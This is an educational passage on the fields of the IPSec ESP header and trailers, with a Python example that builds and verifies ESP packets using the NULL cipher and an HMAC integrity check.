The ESP header has two fields that are inserted between the original IP header and the TCP or UDP header from the original packet:

• Security Parameters Index (SPI) Identifies the SA that was negotiated between the source computer and the destination computer for IPSec communication. The combination of the SPI, the IPSec protocol (AH or ESP), and the source and destination IP addresses identifies the SA used for the IPSec transmission within the ESP packet.

• Sequence Number Protects the SA from replay attacks. This field is incremented by 1 to ensure that packets are never received more than once. If a packet is received with a previous sequence number, that packet is dropped.

The ESP trailer is inserted after the application data from the original packet and includes the following fields:

• Padding A variable length from 0–255 bytes that brings the length of the application data and ESP trailer to a length divisible by 32 bits so that they match the required size for the cipher algorithm.

• Padding Length Indicates the length of the Padding field. After the packet is decrypted, this field is used to determine the length of the Padding field.

• Next Header Identifies the protocol used for the transmission of the data, such as TCP or UDP.

Following the ESP trailer, the ESP protocol adds an ESP authentication trailer to the end of the packet. The ESP authentication trailer contains a single field:

• Authentication Data Contains the ICV, which verifies the originating host that sent the message and ensures that the packet was not modified in transit. The ICV uses the defined integrity algorithm to calculate the ICV. The integrity algorithm is applied to the ESP header, the TCP/UDP header, the application data, and the ESP trailer.

ESP provides integrity protection for the ESP header, the TCP/UDP header, the application data, and the ESP trailer. ESP also provides inspection protection by encrypting the TCP/UDP header, the application data, and the ESP trailer.

TIP When designing an IPSec solution, you can combine AH and ESP protocols in a single IPSec SA. Although both AH and ESP provide integrity protection to transmitted data, AH protects the entire packet from modification, while ESP protects only the IP payload from modification.
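To make the ESP layout concrete (header, padded trailer, and the authentication trailer that covers everything but the IP header), here is an added example written for this article, not code from the Resource Kit or from Windows. It uses ESP with the NULL cipher (RFC 2410), so the "encrypted" region stays readable and the padding arithmetic is visible; the key, SPI, sequence number and payload are constructed. With DES or 3DES, as the text describes, the same region would be a ciphertext and `block_size` would be the cipher's 8-byte block.

```python
"""IPSec ESP layout: header, padded trailer, and the integrity scope.
Added example, not from the article or the Resource Kit. NULL cipher
(RFC 2410) so the payload region is readable; key and data constructed."""
import hashlib
import hmac
import struct

ICV_LEN = 12   # HMAC-SHA1-96 Authentication Data

def esp_padding(payload_len, block_size=4):
    """Padding so payload + padding + Pad Length + Next Header is a multiple
    of block_size (32 bits here; a block cipher would need its block size).
    Default padding bytes are 1, 2, 3, ... as RFC 2406 specifies."""
    pad = (-(payload_len + 2)) % block_size
    return bytes(range(1, pad + 1))

def esp_protect(key, spi, seq, payload, next_header=6, block_size=4):
    """Sender: ESP header | [payload | padding | Pad Length | Next Header] | ICV.
    The ICV covers the ESP header and the whole (encrypted) region, never
    the outer IP header."""
    header = struct.pack("!II", spi, seq)
    padding = esp_padding(len(payload), block_size)
    trailer = padding + struct.pack("!BB", len(padding), next_header)
    encrypted = payload + trailer           # NULL cipher: identity transform
    icv = hmac.new(key, header + encrypted, hashlib.sha1).digest()[:ICV_LEN]
    return header + encrypted + icv

def esp_unprotect(key, packet):
    """Receiver: check the ICV over header + encrypted region first, then
    strip the trailer using Pad Length. Raises ValueError on tampering."""
    header, body, icv = packet[:8], packet[8:-ICV_LEN], packet[-ICV_LEN:]
    expected = hmac.new(key, header + body, hashlib.sha1).digest()[:ICV_LEN]
    if not hmac.compare_digest(expected, icv):
        raise ValueError("ESP ICV mismatch")
    spi, seq = struct.unpack("!II", header)
    pad_len, next_header = body[-2], body[-1]
    if body[-2 - pad_len:-2] != bytes(range(1, pad_len + 1)):
        raise ValueError("bad ESP padding")
    payload = body[:len(body) - 2 - pad_len]
    return {"spi": spi, "seq": seq, "next_header": next_header,
            "payload": payload}
```

Checking the ICV before touching the padding or payload is deliberate: a receiver that parses the trailer first would act on attacker-controlled length bytes, which is exactly the ordering mistake the ESP authentication trailer exists to prevent.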
